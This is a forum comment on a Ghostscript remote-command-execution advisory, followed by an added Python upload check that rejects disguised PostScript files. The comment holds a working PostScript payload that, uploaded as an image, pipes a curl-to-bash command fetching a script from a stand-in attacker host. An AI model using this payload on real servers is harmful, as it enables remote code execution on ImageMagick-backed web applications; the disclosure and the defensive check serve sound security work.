
Ghostscript: multiple critical vulnerabilities inc. remote command execution - planb
https://bugs.chromium.org/p/project-zero/issues/detail?id=1640
======
planb
This is really critical. ImageMagick's convert uses Ghostscript by default if
it detects PDF content, so there are lots of webapps vulnerable now. In some
cases, uploading a test.jpeg with the following text content might be
sufficient to execute code on the server (I just tested this on CentOS):

    
    
       %!PS
       userdict /setpagedevice undef
       legal
       { null restore } stopped { pop } if
       legal
       mark /OutputFile (%pipe%curl http://evilc0rp.co/evil.sh | bash) currentdevice putdeviceprops
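
Added example (not part of the original comment): a defensive upload check for the case described above, where a file named `test.jpeg` actually carries PostScript. The function name, the allowed-extension table and the sample inputs are assumptions made for illustration.

```python
"""Added example: reject uploads whose leading bytes do not match the claimed image type."""
import os

# Magic numbers for the raster formats this hypothetical upload handler accepts.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Signatures of formats that ImageMagick hands to Ghostscript:
# PostScript/EPS ("%!"), PDF ("%PDF-"), and the DOS EPS binary header.
GHOSTSCRIPT_MAGIC = (b"%!", b"%PDF-", b"\xc5\xd0\xd3\xc6")


def classify_upload(filename: str, data: bytes) -> str:
    """Return 'ok' or a rejection reason for an uploaded file."""
    # Skip a UTF-8 BOM and leading whitespace before looking for "%!" / "%PDF-".
    head = data[:1024].lstrip(b"\xef\xbb\xbf \t\r\n")
    if any(head.startswith(sig) for sig in GHOSTSCRIPT_MAGIC):
        return "reject: PostScript/PDF content"
    ext = os.path.splitext(filename)[1].lower()
    expected = IMAGE_MAGIC.get(ext)
    if expected is None:
        return "reject: extension not allowed"
    # The raster magic must sit at offset 0 of the original bytes.
    if not any(data.startswith(sig) for sig in expected):
        return "reject: content does not match extension"
    return "ok"


if __name__ == "__main__":
    # Constructed samples: a PostScript header under a .jpeg name, and a JPEG header.
    samples = [
        ("test.jpeg", b"%!PS\nuserdict /setpagedevice undef\n"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for name, blob in samples:
        print(name, "->", classify_upload(name, blob))
```

This check only looks at the leading bytes, so it belongs in front of the converter as one layer; passing the input to ImageMagick with an explicit format prefix (for example `jpeg:upload.jpg`) additionally stops it from choosing a coder based on the file's content.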

